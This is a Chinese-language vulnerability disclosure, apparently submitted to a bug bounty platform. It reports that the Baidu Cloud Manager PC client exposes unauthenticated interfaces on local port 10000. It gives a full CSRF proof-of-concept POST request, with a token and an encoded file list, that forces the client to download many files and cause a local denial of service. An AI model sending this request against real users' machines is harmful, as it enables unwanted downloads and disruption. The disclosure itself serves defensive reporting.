百度云管家PC版接口存在未授权访问可DoS

百度云管家PC 版接口存在未授权访问可以导致本地DoS ..

出现问题的程序YunDetectService.exe :

在启动百度云管家后,它会绑定在本地10000 端口,用来和百度云盘网页版做交互(比如在网页上面下载文件可以选择两种方式:浏览器下载和百度云管家下载,选择用云管家下载则回由浏览器向本地10000 端口发送下载请求)

支持以下的指令:

访问接口:

**.**.**.**:10000/guanjia?method=GetVersion

**.**.**.**:10000/guanjia?method=GetPcCode

上面两个只是信息泄露测试,出现问题的是下面这个指令:

DownloadShareItems

也就是说,我们可以构造一个页面CSRF 让百度云管家下载就可以了

PoC :

POST 数据包

URL:

**.**.**.**:10000/guanjia?method=DownloadSelfOwnItems&uk=1&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528

Data:

filelist=opUqZIg7lhaXjq7YJjQV1t65d4G2NZJr6mwXG8IGv3UwlYw5mP0UC2r5sv60rQVNP%2FJADoBMnmhBNIXdLeoH6063Mcllu1I81AKbcTEZvkW079GLbHPnFk3zcxO%2BfWMW5ijSiBHRAj1dwT8C0OtwHucRtzWNP%2FFRgB7vBRMGWAy8wO4NdVHc4GU8Pj5wmE%2FG8lmtqOgMZdLhW749%2F1nay8u0lk%2BLmxY%2F8m8w0yyf6nSJ1dOIIBgqjMPL312OdSXOqDC8G%2BTF31WZ5AkmfrphIrwPQCkY9AFxlwLmRhyvX07h5csqBWBtiTdVzrR5JegZm1hxsub7mgr2O2qBr6ojdvUIFXCqDFrnAGDPtLbSnnqPKTytfGk1sj3mK90mZgAAO4lBuhrqzOHoYxnOpUJGuIoRxy1YIGgz3rM2vPtv%2Fbyg1tzIlqENHjuJQboa6szhNcZj61RGimgS8Av6SdATZcLVhZYQcC5qw5ve7qXn5gzX9bRPaltAde%2FIPvTcKx5AXX9JWUk6fyBqM73s5N5xjaReDNiDgKZctEPiM1N2Ud7gPFc9F7FGmzuTRG%2FS8qcmcEgpAmyO9KhDsOecN42yPvONAMLP3JeBgREIQ869NHNCGWqZN4uu2cCex4z3STOGnHMqGZLlKUSNitgd6PKYqz%2FyQA6ATJ5oQTSF3S3qB%2BtOtzHJZbtSPNQCm3ExGb5FtO%2FRi2xz5xaEVDxKOqQfBkmYq%2FhfAGm5c1lIZmfX91tguT2rpCXLJr3BABmrVCqB6A%2BtlIr65gqQ4MBsbsZb5C%2FBuMkT6lH1Pf0OHvDecdYDZaMDf5n%2BvhIvEELX4GjiSriBSx5Up7UpEUc6DW%2FkhcBmLbCZhceA34PnAPrArNcFCNdTGAsy9EFRudCSGYuXVpSPShcZUx2N9X7qdSPt3xT7dpH5Q8dnkt8FUVBQGQR%2FD6GscwXz9aHkfWUPAcmOYc0PVKxRh6uoQKtrycSnIie3y%2BLviFOgeYgvtZIfXIpJk7yK1EcMlist7567m%2FKQJkYtiRjhfxyZCiL5I4b7N4sUkl6EvdULtAy4LJ%2B7%2BcW8K8fa82Qi9d2Fp2RnXTXAMv4NtvYdEpcH1FJ6bl02AQYzb29VO3sy6fQ6hsPq907TGfe81%2F7T4zOp03vgLPRFNtCBrmMVRyKg1ktVawKciivKm73%2FyrDMnnNS34A6yBLCPIpUUFrTHduc%2F%2FziCe6opE0HgPnM1%2F2%2FIGRScaW%2FC9vwWLiVN0Oad7SJl6RkisEDuaI9mQoiYj%2FqV3%2BQ%2B5jN37TUo9dk3o4Ug17StVVJJ9eUPPlvmRoCythk7pScAZ98off2V1%2FgulVgaE44xtvCHxMsspEMbauK8y0epJVLQGhFscO0G0T0ofno%2BoynZNc%3D

完整的PoC 在这(DoS 的原理是让百度云管家同时下载大量文件,资源随便找了两个比较大的来测试),下面有测试URL 地址:

测试URL (麻烦帮我打个码):

http://**.**.**.**/baidu_Cloud_CSRF_download.html

PoC 效果

没有执行测试URL 之前:

执行测试URL 之后: